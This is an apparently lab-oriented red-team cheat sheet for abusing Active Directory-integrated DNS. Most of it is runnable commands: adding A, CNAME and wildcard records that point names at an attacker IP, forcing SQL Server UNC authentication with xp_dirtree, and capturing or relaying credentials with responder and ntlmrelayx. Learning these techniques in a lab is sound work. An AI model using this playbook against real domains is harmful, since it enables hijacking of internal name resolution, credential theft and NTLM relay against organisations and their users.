ADIDNS abuse means writing DNS records into an AD-integrated DNS zone. Once we control a record, we control where clients go when they resolve that name. That is enough to collect authentication, feed relay attacks, redirect application traffic, or create believable infrastructure names for later movement.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'
Check existing records
adidnsdump -u "$DOMAIN\\$USER" -p "$PASS" ldap://$DC -r
dig @$DC fileshare.$DOMAIN A +short
Kerberos setup
echo "$PASS" | kinit "$USER@${DOMAIN^^}"
klist
Add a record with secure dynamic update
nsupdate -g
server 10.10.10.200
zone ootw.local
update add fileshare.ootw.local 60 A 10.10.10.100
send
quit
Verify
dig @$DC fileshare.$DOMAIN A +short
nslookup fileshare.$DOMAIN $DC
Add a record with krbrelayx dnstool
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record fileshare --data $ATTACKER $DC
dig @$DC fileshare.$DOMAIN A +short
Use the record for capture
sudo responder -I eth0
Force a UNC authentication path
EXEC master..xp_dirtree '\\fileshare.ootw.local\share',1,1;
EXEC master..xp_fileexist '\\fileshare.ootw.local\share\file.txt';
Use the record for relay
ntlmrelayx.py -tf targets.txt -smb2support
Then trigger the victim to resolve and connect to the attacker-controlled name.
\\fileshare.ootw.local\share
http://fileshare.ootw.local/
CNAME option
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record intranet --type CNAME --data fileshare.ootw.local $DC
dig @$DC intranet.$DOMAIN CNAME
Wildcard option
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record '*' --data $ATTACKER $DC
dig @$DC definitely-not-real.$DOMAIN A +short
Delete with secure dynamic update
nsupdate -g
server 10.10.10.200
zone ootw.local
update delete fileshare.ootw.local A
send
quit
Delete with dnstool
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record fileshare $DC
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record intranet $DC
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record '*' $DC
Notes
Use names that make sense in the environment.
Use short TTL values during labs.
Wildcard records are noisy and can break normal name resolution assumptions.
Do not overwrite real production records unless the exercise explicitly requires it.
Always verify with the target DNS server, not with a cached local resolver.
ADIDNS write is not the end goal. The value comes from what authenticates to the name after the record exists.